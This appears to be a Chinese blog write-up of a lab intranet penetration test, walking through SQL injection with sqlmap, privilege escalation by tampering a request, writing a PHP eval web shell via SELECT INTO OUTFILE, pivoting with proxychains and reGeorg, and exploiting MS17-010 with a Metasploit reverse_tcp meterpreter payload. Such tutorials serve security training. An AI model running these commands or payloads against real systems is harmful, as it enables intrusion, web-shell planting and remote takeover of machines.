记一次简单易上手的内网渗透实战
我们大部分渗透操作都是从外网开始的,如果要获得更多的机器权限和维持权限,就必须掌握内获得更多的机器权限和维持权限,就必须掌握内网渗透的技能。本次用通俗易懂的方式为大家讲解内网渗透的相关知识,建立内网渗透知识的框架,打开一扇新的大门 ,解决面试中内网相关的问题。
环境是模拟的
目标 IP192.168.31.102 该 web 主机下 有两台虚拟机
渗透目标: 拿到虚拟机的 shell
先信息收集、
目标绑定 jy.test.com
访问 192.168.31.196 存在探针

Nmap 端口扫描 192.168.31.196
开放 135、 3306 、 445 、 139、 80 端口
御剑扫描后台发现后台地址
并且存在 info 页面


1、很多已经买不到的绝版电子书
2、安全大厂内部的培训资料
3、全套工具包
4、100 份 src 源码技术文档
5、网络安全基础入门、Linux、web 安全、攻防方面的视频
6、应急响应笔记
7、 网络安全学习路线
8、ctf 夺旗赛解析
9、WEB 安全入门笔记
一阶段:拿主站
访问目标网站
对主站进行测试的时候发现存在明显的 SQL 注入 payload


用 SQLmap 跑一把
python sqlmap.py -u"http://jy.test.com/person/cnresume_view.php?rid=1" --dbs

最后抛出 3 个管理,两个普通 1 个超级管理
超管没解开 hash
用 data 普通管理登陆后台之后随便搞了搞发现竟然可以执行 sql 语句,我得天。。并且存在越权漏洞
first、先说一下这个越权漏洞
登陆 data 普通管理员账号
点击添加管理员提示无权限


用 burp 抓包修改参数,把管理改为超管


继续此操作添加了一个 admin 同级的超管

second、再说这个 sql 语句执行直接写入一句话木马
sql 命令
select "<?php eval($_POST[szg]);?>" into outfile "C:/UPUPW_AP5.2/htdocs/szg.php"

连接 1 句话木马上传

上传大马执行 arp -a
海岸该主机下还存在
192.168.238.129
192.168.238.130

三、
我们的 C 段实在 192.168.31 与目标内网并不在同一个段内
在 kaili 的 proxychains 和 reGeorgSocksProxy 配合进行代理
vim /etc/proxychains.conf
去掉 dynamic_chain 前面的 #号
去掉最后一行 socks4 那行,然后添加 socks5 127.0.0.1 8080(我的占用了这里是用的 1080)

shift+:wq 保存并退出
之后想让哪个命令或者应用通过代理直接用命令 proxychains+对应的命令或者应用,例如:
proxychains firefox
启动火狐浏览器
访问我们 ping 不通的 192.168.238.128 代理成功

用 nmap 进行扫描 192.168.238.129/130
目标开放 445 端口且是 XP 系统
我们
使用 exploit 模块来进行攻击测试

use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/reverse_tcp //###set payload windows/meterpreter/reverse_tcp### //针对目标机器使用的系统版本,目标机器 32 位就使用 32 位(去掉*64)

run 返弹了一个 shell

系统是 system 权限没进行限制
添加一个用户

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Hvzd9ZTV-1652793382222)(https://upload-images.jianshu.io/upload_images/26472780-5e70396c3a99ec32.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
下面的就自己操作了

下面是一些 MSF 中的常用命令
基本命令
文件系统命令
(1)下载文件
使用命令“download +file path”,将下载目标机器的相对应权限的任何路径下的文件
(2)上传文件
“upload”命令为上传文件到我们的目标机器,在图中我们上传了 ll.txt 到目标机器的 c:\pp\下。
(3)查看文件
“cat filename”在当前目录下查看文件内容,输入命令后便会返回给我们所查看文件的内容。
mimikatz 模块:
评论